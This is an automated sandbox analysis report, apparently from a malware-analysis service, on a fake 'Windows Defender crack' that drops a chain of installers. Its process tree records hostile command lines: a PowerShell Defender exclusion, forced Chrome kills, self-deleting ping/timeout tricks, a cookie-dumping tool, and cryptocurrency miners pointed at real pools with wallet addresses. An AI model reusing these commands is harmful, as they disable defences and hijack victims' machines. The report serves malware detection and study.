01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 9500 PING.EXE 4468 PING.EXE 3644 PING.EXE 4240 PING.EXE 4320 PING.EXE -
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 287 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 569 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 755 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 124 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 130 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 282 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 750 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 752 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 754 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 588 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 597 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 603 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 964 setups.tmp 964 setups.tmp -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 2500 Setup.exe Token: SeCreateTokenPrivilege 3636 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 3636 askinstall20.exe Token: SeLockMemoryPrivilege 3636 askinstall20.exe Token: SeIncreaseQuotaPrivilege 3636 askinstall20.exe Token: SeMachineAccountPrivilege 3636 askinstall20.exe Token: SeTcbPrivilege 3636 askinstall20.exe Token: SeSecurityPrivilege 3636 askinstall20.exe Token: SeTakeOwnershipPrivilege 3636 askinstall20.exe Token: SeLoadDriverPrivilege 3636 askinstall20.exe Token: SeSystemProfilePrivilege 3636 askinstall20.exe Token: SeSystemtimePrivilege 3636 askinstall20.exe Token: SeProfSingleProcessPrivilege 3636 askinstall20.exe Token: SeIncBasePriorityPrivilege 3636 askinstall20.exe Token: SeCreatePagefilePrivilege 3636 askinstall20.exe Token: SeCreatePermanentPrivilege 3636 askinstall20.exe Token: SeBackupPrivilege 3636 askinstall20.exe Token: SeRestorePrivilege 3636 askinstall20.exe Token: SeShutdownPrivilege 3636 askinstall20.exe Token: SeDebugPrivilege 3636 askinstall20.exe Token: SeAuditPrivilege 3636 askinstall20.exe Token: SeSystemEnvironmentPrivilege 3636 askinstall20.exe Token: SeChangeNotifyPrivilege 3636 askinstall20.exe Token: SeRemoteShutdownPrivilege 3636 askinstall20.exe Token: SeUndockPrivilege 3636 askinstall20.exe Token: SeSyncAgentPrivilege 3636 askinstall20.exe Token: SeEnableDelegationPrivilege 3636 askinstall20.exe Token: SeManageVolumePrivilege 3636 askinstall20.exe Token: SeImpersonatePrivilege 3636 askinstall20.exe Token: SeCreateGlobalPrivilege 3636 askinstall20.exe Token: 31 3636 askinstall20.exe Token: 32 3636 askinstall20.exe Token: 33 3636 askinstall20.exe Token: 34 3636 askinstall20.exe Token: 35 3636 askinstall20.exe Token: SeDebugPrivilege 1340 multitimer.exe Token: SeDebugPrivilege 4212 taskkill.exe Token: SeDebugPrivilege 972 MicrosoftEdge.exe Token: SeDebugPrivilege 972 MicrosoftEdge.exe Token: SeDebugPrivilege 972 MicrosoftEdge.exe Token: SeDebugPrivilege 972 MicrosoftEdge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2068 setups.exe 964 setups.tmp 972 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1180 wrote to memory of 544 1180 Microsoft_Windows_Defender_crack.exe 79 PID 1180 wrote to memory of 544 1180 Microsoft_Windows_Defender_crack.exe 79 PID 1180 wrote to memory of 544 1180 Microsoft_Windows_Defender_crack.exe 79 PID 544 wrote to memory of 2752 544 cmd.exe 82 PID 544 wrote to memory of 2752 544 cmd.exe 82 PID 544 wrote to memory of 2752 544 cmd.exe 82 PID 544 wrote to memory of 980 544 cmd.exe 83 PID 544 wrote to memory of 980 544 cmd.exe 83 PID 544 wrote to memory of 980 544 cmd.exe 83 PID 544 wrote to memory of 832 544 cmd.exe 84 PID 544 wrote to memory of 832 544 cmd.exe 84 PID 544 wrote to memory of 832 544 cmd.exe 84 PID 544 wrote to memory of 1552 544 cmd.exe 85 PID 544 wrote to memory of 1552 544 cmd.exe 85 PID 544 wrote to memory of 1552 544 cmd.exe 85 PID 2752 wrote to memory of 2480 2752 keygen-pr.exe 86 PID 2752 wrote to memory of 2480 2752 keygen-pr.exe 86 PID 2752 wrote to memory of 2480 2752 keygen-pr.exe 86 PID 1552 wrote to memory of 2500 1552 keygen-step-4.exe 87 PID 1552 wrote to memory of 2500 1552 keygen-step-4.exe 87 PID 832 wrote to memory of 388 832 keygen-step-3.exe 88 PID 832 wrote to memory of 388 832 keygen-step-3.exe 88 PID 832 wrote to memory of 388 832 keygen-step-3.exe 88 PID 2480 wrote to memory of 4044 2480 key.exe 89 PID 2480 wrote to memory of 4044 2480 key.exe 89 PID 2480 wrote to memory of 4044 2480 key.exe 89 PID 388 wrote to memory of 3644 388 cmd.exe 91 PID 388 wrote to memory of 3644 388 cmd.exe 91 PID 388 wrote to memory of 3644 388 cmd.exe 91 PID 2500 wrote to memory of 1340 2500 Setup.exe 92 PID 2500 wrote to memory of 1340 2500 Setup.exe 92 PID 2500 wrote to memory of 2068 2500 Setup.exe 93 PID 2500 wrote to memory of 2068 2500 Setup.exe 93 PID 2500 wrote to memory of 2068 2500 Setup.exe 93 PID 1552 wrote to memory of 3636 1552 keygen-step-4.exe 94 PID 1552 wrote to memory of 3636 1552 keygen-step-4.exe 94 PID 1552 wrote to memory of 3636 1552 keygen-step-4.exe 94 PID 2068 wrote to memory of 964 2068 setups.exe 95 PID 2068 wrote to memory of 964 2068 setups.exe 95 PID 2068 wrote to memory of 964 2068 setups.exe 95 PID 3636 wrote to memory of 3428 3636 askinstall20.exe 97 PID 3636 wrote to memory of 3428 3636 askinstall20.exe 97 PID 3636 wrote to memory of 3428 3636 askinstall20.exe 97 PID 3428 wrote to memory of 4212 3428 cmd.exe 101 PID 3428 wrote to memory of 4212 3428 cmd.exe 101 PID 3428 wrote to memory of 4212 3428 cmd.exe 101 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 10096 attrib.exe 8704 attrib.exe 10688 attrib.exe 11228 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_Defender_crack.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_Defender_crack.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:980
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe" 1 3.1617432422.60680f665e729 1016⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\1WFMZ0QX63\multitimer.exe" 2 3.1617432422.60680f665e7297⤵PID:4828
-
C:\Users\Admin\AppData\Local\Temp\ed3xd04kvni\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ed3xd04kvni\Setup3310.exe" /Verysilent /subid=5778⤵PID:4908
-
C:\Users\Admin\AppData\Local\Temp\is-K47ED.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-K47ED.tmp\Setup3310.tmp" /SL5="$302CA,138429,56832,C:\Users\Admin\AppData\Local\Temp\ed3xd04kvni\Setup3310.exe" /Verysilent /subid=5779⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\is-A90SF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-A90SF.tmp\Setup.exe" /Verysilent10⤵PID:5216
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:5884
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:1196
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4340
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:5900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 94812⤵
- Program crash
PID:11048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 100412⤵
- Program crash
PID:11100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 108012⤵
- Program crash
PID:5452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 105612⤵
- Program crash
PID:10836
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:5920
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:5936
-
C:\Users\Admin\AppData\Local\Temp\is-88L7N.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-88L7N.tmp\LabPicV3.tmp" /SL5="$2030E,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\is-A3D8T.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-A3D8T.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:5672
-
C:\Program Files\Windows Portable Devices\UZGEHKWDHB\prolab.exe"C:\Program Files\Windows Portable Devices\UZGEHKWDHB\prolab.exe" /VERYSILENT14⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\is-BMD54.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-BMD54.tmp\prolab.tmp" /SL5="$402D2,575243,216576,C:\Program Files\Windows Portable Devices\UZGEHKWDHB\prolab.exe" /VERYSILENT15⤵PID:5200
-
-
-
C:\Users\Admin\AppData\Local\Temp\bc-197f1-c21-9b1a3-0bdd2afcc2156\Kokikujowy.exe"C:\Users\Admin\AppData\Local\Temp\bc-197f1-c21-9b1a3-0bdd2afcc2156\Kokikujowy.exe"14⤵PID:5052
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\laa1pkrb.knd\md6_6ydj.exe & exit15⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\laa1pkrb.knd\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\laa1pkrb.knd\md6_6ydj.exe16⤵PID:6400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cri4azl.ant\askinstall31.exe & exit15⤵PID:6872
-
C:\Users\Admin\AppData\Local\Temp\0cri4azl.ant\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\0cri4azl.ant\askinstall31.exe16⤵PID:6716
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6436
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:7348
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe & exit15⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe16⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\a0ot2hak.yit\toolspab1.exe17⤵PID:4792
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\25awejvd.ynk\setup_10.2_mix.exe & exit15⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\25awejvd.ynk\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\25awejvd.ynk\setup_10.2_mix.exe16⤵PID:8136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2cgnhhen.gj4\GcleanerWW.exe /mixone & exit15⤵PID:7184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zy2nwgyo.waq\app.exe /8-2222 & exit15⤵PID:7336
-
C:\Users\Admin\AppData\Local\Temp\zy2nwgyo.waq\app.exeC:\Users\Admin\AppData\Local\Temp\zy2nwgyo.waq\app.exe /8-222216⤵PID:7680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v2isbgaq.e4y\file.exe & exit15⤵PID:7740
-
C:\Users\Admin\AppData\Local\Temp\v2isbgaq.e4y\file.exeC:\Users\Admin\AppData\Local\Temp\v2isbgaq.e4y\file.exe16⤵PID:7916
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:7364
-
C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:6316
-
C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe" 1 3.1617432579.60681003dde86 10119⤵PID:8380
-
C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\OJSUIVT0DU\multitimer.exe" 2 3.1617432579.60681003dde8620⤵PID:8884
-
C:\Users\Admin\AppData\Local\Temp\mpnfzdqzpdm\vict.exe"C:\Users\Admin\AppData\Local\Temp\mpnfzdqzpdm\vict.exe" /VERYSILENT /id=53521⤵PID:8232
-
C:\Users\Admin\AppData\Local\Temp\is-D4HHA.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-D4HHA.tmp\vict.tmp" /SL5="$304EE,870426,780800,C:\Users\Admin\AppData\Local\Temp\mpnfzdqzpdm\vict.exe" /VERYSILENT /id=53522⤵PID:5148
-
C:\Users\Admin\AppData\Local\Temp\is-10TCM.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-10TCM.tmp\win1host.exe" 53523⤵PID:9680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ujericccvce\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ujericccvce\Setup3310.exe" /Verysilent /subid=57721⤵PID:9116
-
C:\Users\Admin\AppData\Local\Temp\is-KVGS0.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KVGS0.tmp\Setup3310.tmp" /SL5="$704EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\ujericccvce\Setup3310.exe" /Verysilent /subid=57722⤵PID:7244
-
C:\Users\Admin\AppData\Local\Temp\is-TJQF3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TJQF3.tmp\Setup.exe" /Verysilent23⤵PID:8824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\owuvwzrkveq\app.exe"C:\Users\Admin\AppData\Local\Temp\owuvwzrkveq\app.exe" /8-2321⤵PID:7884
-
-
C:\Users\Admin\AppData\Local\Temp\ui2ra211uqf\4jcsiz3mdb0.exe"C:\Users\Admin\AppData\Local\Temp\ui2ra211uqf\4jcsiz3mdb0.exe" /ustwo INSTALL21⤵PID:7552
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4jcsiz3mdb0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ui2ra211uqf\4jcsiz3mdb0.exe" & exit22⤵PID:4488
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4jcsiz3mdb0.exe" /f23⤵
- Kills process with taskkill
PID:7584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\01fxtcsav2z\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\01fxtcsav2z\cpyrix.exe" /VERYSILENT21⤵PID:9148
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:9824
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:9604
-
-
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵PID:6656
-
C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f5cb8528-b7cc-47dc-8315-2bf243773dea\AdvancedRun.exe" /SpecialRun 4101d8 665624⤵PID:5656
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:8464
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵PID:548
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
PID:10580
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵PID:11092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 158423⤵
- Program crash
PID:3156
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\30di2mfthep\vpn.exe"C:\Users\Admin\AppData\Local\Temp\30di2mfthep\vpn.exe" /silent /subid=48221⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\is-FGCF5.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-FGCF5.tmp\vpn.tmp" /SL5="$1080C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\30di2mfthep\vpn.exe" /silent /subid=48222⤵PID:8540
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RF66NSD16U\setups.exe"C:\Users\Admin\AppData\Local\Temp\RF66NSD16U\setups.exe" ll18⤵PID:7968
-
C:\Users\Admin\AppData\Local\Temp\is-1SD1R.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-1SD1R.tmp\setups.tmp" /SL5="$2062A,635399,250368,C:\Users\Admin\AppData\Local\Temp\RF66NSD16U\setups.exe" ll19⤵PID:3948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:5128
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:7020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:324
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵PID:8692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:9000
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:8088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:9096
-
C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe"C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe"18⤵PID:7808
-
C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe"C:\Users\Admin\AppData\Roaming\9B5C.tmp.exe"19⤵PID:792
-
-
-
C:\Users\Admin\AppData\Roaming\D5D6.tmp.exe"C:\Users\Admin\AppData\Roaming\D5D6.tmp.exe"18⤵PID:1768
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:8648
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:10004
-
-
-
C:\Users\Admin\AppData\Roaming\D8F4.tmp.exe"C:\Users\Admin\AppData\Roaming\D8F4.tmp.exe"18⤵PID:7200
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D8F4.tmp.exe19⤵PID:3240
-
C:\Windows\SysWOW64\timeout.exetimeout /t 320⤵
- Delays execution with timeout.exe
PID:3892
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:9296
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:4468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵PID:8680
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wj1mugc.os5\Four.exe & exit15⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\2wj1mugc.os5\Four.exeC:\Users\Admin\AppData\Local\Temp\2wj1mugc.os5\Four.exe16⤵PID:7616
-
C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:7576
-
C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe" 1 3.1617432581.60681005179e7 10418⤵PID:8580
-
C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0ZWBAHWTHV\multitimer.exe" 2 3.1617432581.60681005179e719⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\5paasmiurye\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\5paasmiurye\cpyrix.exe" /VERYSILENT20⤵PID:9716
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:688
-
C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵PID:4048
-
C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\7573c673-ca18-4447-bf06-4eda6d621aed\AdvancedRun.exe" /SpecialRun 4101d8 404823⤵PID:7556
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵PID:8552
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵PID:10320
-
C:\Windows\SysWOW64\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
PID:9528
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:2432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 150822⤵
- Program crash
PID:10612
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:8796
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:2524
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wy44jzjlajm\vpn.exe"C:\Users\Admin\AppData\Local\Temp\wy44jzjlajm\vpn.exe" /silent /subid=48220⤵PID:9704
-
C:\Users\Admin\AppData\Local\Temp\is-65BS9.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-65BS9.tmp\vpn.tmp" /SL5="$20840,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wy44jzjlajm\vpn.exe" /silent /subid=48221⤵PID:10068
-
-
-
